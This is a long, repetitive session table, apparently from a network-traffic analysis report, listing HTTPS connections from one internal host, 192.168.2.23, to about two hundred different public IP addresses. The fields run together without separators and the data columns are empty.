                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12824192.168.2.235418272.66.167.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12825192.168.2.234677253.144.149.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12826192.168.2.2334828171.52.94.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12827192.168.2.2344292112.58.99.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12828192.168.2.2340376116.65.3.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12829192.168.2.2358630112.248.126.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12830192.168.2.2339530182.142.90.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12831192.168.2.2340550160.120.16.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12832192.168.2.2355388202.119.153.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12833192.168.2.235329817.78.186.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12834192.168.2.234211652.146.204.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12835192.168.2.2334994143.224.219.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12836192.168.2.235635458.234.71.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12837192.168.2.2358484216.0.73.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12838192.168.2.2351952131.57.166.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12839192.168.2.2349286183.190.66.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12840192.168.2.235997681.213.10.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12841192.168.2.2336906138.123.66.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12842192.168.2.2349844205.65.18.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12843192.168.2.23416981.156.123.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12844192.168.2.235620854.151.232.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12845192.168.2.2334814179.74.144.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12846192.168.2.2346180153.198.228.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12847192.168.2.234375292.61.231.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12848192.168.2.235870825.160.44.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12849192.168.2.234814850.73.18.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12850192.168.2.233443437.164.212.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12851192.168.2.2341650207.94.67.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12852192.168.2.2347446160.44.82.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12853192.168.2.2360378206.29.74.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12854192.168.2.235930232.81.77.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12855192.168.2.2338906161.99.102.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12856192.168.2.2337902106.44.151.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12857192.168.2.2357146185.23.176.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12858192.168.2.2354028166.53.69.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12859192.168.2.2340646135.108.6.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12860192.168.2.2352178170.224.193.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12861192.168.2.2336512150.66.200.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12862192.168.2.2355736126.138.130.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12863192.168.2.2351432142.72.48.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12864192.168.2.235294238.114.70.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12865192.168.2.23348825.187.33.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12866192.168.2.2352056121.227.255.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12867192.168.2.2338182179.15.12.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12868192.168.2.2334448157.215.96.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12869192.168.2.2333218113.58.71.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12870192.168.2.2349524154.185.22.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12871192.168.2.233338092.170.234.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12872192.168.2.235683824.85.132.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12873192.168.2.2338674123.18.141.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12874192.168.2.2352334205.245.249.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12875192.168.2.2346208182.147.18.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12876192.168.2.2340906210.108.54.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12877192.168.2.2335742221.71.101.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12878192.168.2.2358666185.228.11.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12879192.168.2.2334390205.36.87.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12880192.168.2.233902436.25.55.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12881192.168.2.2335396133.192.252.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12882192.168.2.235642466.225.212.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12883192.168.2.2334518167.34.117.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12884192.168.2.235565457.86.149.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12885192.168.2.2345524143.159.165.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12886192.168.2.23338269.62.125.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12887192.168.2.235914241.178.168.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12888192.168.2.2344690200.232.80.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12889192.168.2.234960896.149.175.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12890192.168.2.236075283.183.203.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12891192.168.2.235090220.27.203.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12892192.168.2.234446218.136.213.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12893192.168.2.2355906200.55.104.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12894192.168.2.233521824.139.53.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12895192.168.2.2340466153.189.50.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12896192.168.2.233827296.72.187.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12897192.168.2.2335968156.70.185.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12898192.168.2.2343340131.153.219.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12899192.168.2.2346852141.7.72.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12900192.168.2.2356820151.8.162.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12901192.168.2.235177240.66.38.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12902192.168.2.235670451.218.18.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12903192.168.2.233614646.11.110.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12904192.168.2.2355110131.167.233.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12905192.168.2.2351876191.47.151.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12906192.168.2.2343618144.124.64.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12907192.168.2.2359912140.169.209.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12908192.168.2.234813084.255.53.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12909192.168.2.2350492129.38.85.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12910192.168.2.2352674181.192.183.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12911192.168.2.234742249.32.182.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12912192.168.2.2334196197.116.225.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12913192.168.2.2356964132.239.46.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12914192.168.2.234148862.211.27.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12915192.168.2.235733083.36.165.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12916192.168.2.2349612220.127.44.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12917192.168.2.2346824212.229.134.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12918192.168.2.2335200102.3.134.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12919192.168.2.235291679.205.44.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12920192.168.2.23432168.184.252.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12921192.168.2.234231014.114.36.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12922192.168.2.2337082143.78.48.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12923192.168.2.2358592167.132.96.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12924192.168.2.2344436163.196.163.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12925192.168.2.2333592106.199.197.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12926192.168.2.2344402130.174.37.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12927192.168.2.2357296222.188.162.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12928192.168.2.2358878132.179.204.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12929192.168.2.2333466112.120.72.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12930192.168.2.235943297.176.170.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12931192.168.2.234077435.142.161.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12932192.168.2.2357156158.247.176.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12933192.168.2.2344874126.23.31.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12934192.168.2.2350298149.62.69.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12935192.168.2.2355318205.115.147.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12936192.168.2.2336668103.206.29.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12937192.168.2.2358108219.251.204.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12938192.168.2.235480685.108.183.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12939192.168.2.2356372213.179.227.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12940192.168.2.2353774114.121.0.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12941192.168.2.233886091.90.224.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12942192.168.2.233522254.249.101.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12943192.168.2.235590879.155.59.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12944192.168.2.2342002159.83.226.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12945192.168.2.2344104211.166.189.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12946192.168.2.2360302161.93.244.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12947192.168.2.233498459.209.65.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12948192.168.2.2339592199.250.177.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12949192.168.2.2358454145.168.69.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12950192.168.2.2350754206.8.159.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12951192.168.2.23365689.74.174.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12952192.168.2.235135252.255.181.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12953192.168.2.2346726174.181.211.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12954192.168.2.2337038176.248.233.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12955192.168.2.2334288118.52.178.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12956192.168.2.2353714222.150.199.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12957192.168.2.2342082213.188.146.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12958192.168.2.2338336158.203.137.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12959192.168.2.2340236173.31.54.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12960192.168.2.234301890.4.106.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12961192.168.2.2345206186.93.149.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12962192.168.2.2347782208.18.227.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12963192.168.2.2360370176.64.71.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12964192.168.2.2352118122.84.116.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12965192.168.2.2347222175.254.139.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12966192.168.2.2355230202.122.246.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12967192.168.2.2352138206.95.213.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12968192.168.2.234414871.134.136.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12969192.168.2.2359386159.189.120.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12970192.168.2.2334818213.128.102.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12971192.168.2.2339598174.123.46.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12972192.168.2.2343434135.42.82.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12973192.168.2.235432649.38.14.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12974192.168.2.234122678.109.74.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12975192.168.2.234840454.183.183.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12976192.168.2.2353770206.51.214.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12977192.168.2.2344452195.98.151.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12978192.168.2.2351442157.103.216.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12979192.168.2.234716265.5.84.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12980192.168.2.2358190204.179.148.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12981192.168.2.2352286146.182.26.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12982192.168.2.2360492175.72.68.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12983192.168.2.2356562126.183.99.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12984192.168.2.235800812.136.64.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12985192.168.2.2356456143.74.188.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12986192.168.2.2340478202.254.42.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12987192.168.2.233666073.191.83.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12988192.168.2.2347684153.128.111.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12989192.168.2.2347500216.108.122.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12990192.168.2.2344786173.166.26.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12991192.168.2.233620477.0.72.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12992192.168.2.234829063.162.209.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12993192.168.2.2351000138.52.1.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12994192.168.2.2352540165.93.5.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12995192.168.2.2358596143.137.226.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12996192.168.2.2336264180.6.182.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12997192.168.2.2332958178.16.106.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12998192.168.2.2349486123.236.52.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12999192.168.2.233814283.206.67.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13000192.168.2.235933612.204.179.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13001192.168.2.2339766175.238.160.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13002192.168.2.2357870189.28.198.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13003192.168.2.2357228128.154.197.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13004192.168.2.2358778173.19.88.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13005192.168.2.2349794164.177.246.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13006192.168.2.233816646.144.84.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13007192.168.2.234227057.171.245.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13008192.168.2.234768435.71.85.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13009192.168.2.2334260155.49.213.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13010192.168.2.2359610180.149.65.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13011192.168.2.2347398180.253.194.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13012192.168.2.236044851.133.99.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13013192.168.2.235513040.52.171.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13014192.168.2.2339602134.122.158.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13015192.168.2.2334776182.43.47.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13016192.168.2.234340231.224.238.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13017192.168.2.235634290.102.8.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13018192.168.2.2349794114.15.6.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13019192.168.2.233449637.21.138.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13020192.168.2.2355856189.51.249.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13021192.168.2.234185047.47.157.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13022192.168.2.235240220.233.27.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13023192.168.2.2359372154.194.225.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13024192.168.2.2347052213.149.180.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13025192.168.2.2340920208.158.184.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13026192.168.2.23556821.90.98.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13027192.168.2.2354600107.140.65.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13028192.168.2.234372651.80.33.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13029192.168.2.2334008216.229.253.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13030192.168.2.2358280136.5.192.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13031192.168.2.234993486.91.46.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13032192.168.2.2339024170.83.2.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13033192.168.2.234364423.39.185.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13034192.168.2.2338944112.41.11.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13035192.168.2.2342248181.240.56.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13036192.168.2.235009618.21.26.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13037192.168.2.2358342209.178.185.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13038192.168.2.234607024.142.135.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13039192.168.2.235455072.20.142.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13040192.168.2.23512828.111.111.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13041192.168.2.235108048.92.4.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13042192.168.2.233678663.40.228.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13043192.168.2.233991262.81.188.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13044192.168.2.235611247.15.175.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
